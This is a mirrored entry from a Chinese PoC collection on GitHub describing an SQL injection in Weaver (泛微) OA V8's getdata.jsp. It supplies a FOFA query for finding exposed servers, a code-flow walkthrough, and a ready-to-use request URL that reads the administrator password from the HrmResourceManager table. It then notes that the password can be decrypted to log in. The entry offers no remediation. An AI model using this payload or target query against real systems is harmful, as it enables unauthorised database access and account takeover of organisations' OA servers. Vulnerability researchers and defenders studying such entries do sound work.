admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/泛微OA getdata.jsp SQL注入漏洞.md
Threekiii 28b9d3edce 更新漏洞库:CMS漏洞/
2022-05-24 17:27:26 +08:00

56 lines
1.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 泛微OA V8 getdata.jsp SQL注入漏洞
## 漏洞描述
泛微OA V8 存在SQL注入漏洞攻击者可以通过漏洞获取管理员权限和服务器权限
## 漏洞影响
```
泛微OA V8
```
## FOFA
```
app="泛微-协同办公OA"
```
## 漏洞复现
在getdata.jsp中直接将request对象交给
**weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :**
方法处理
![image-20220209104257902](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091042978.png)
在getData方法中判断请求里cmd参数是否为空如果不为空调用proc方法
![image-20220209104319947](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043985.png)
Proc方法4个参数(“空字符串”,”cmd参数值”,request对象serverContext对象)
在proc方法中对cmd参数值进行判断当cmd值等于getSelectAllId时再从请求中获取sql和type两个参数值并将参数传递进getSelectAllIdssql,type方法中
![image-20220209104335191](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043319.png)
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成对数据库操控
POC
```plain
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```
查询HrmResourceManager表中的password字段页面中返回了数据库第一条记录的值sysadmin用户的password
![image-20220209104351654](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091043694.png)解密后即可登录系统
![image-20220209104408461](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091044509.png)
Reference in New Issue View Git Blame Copy Permalink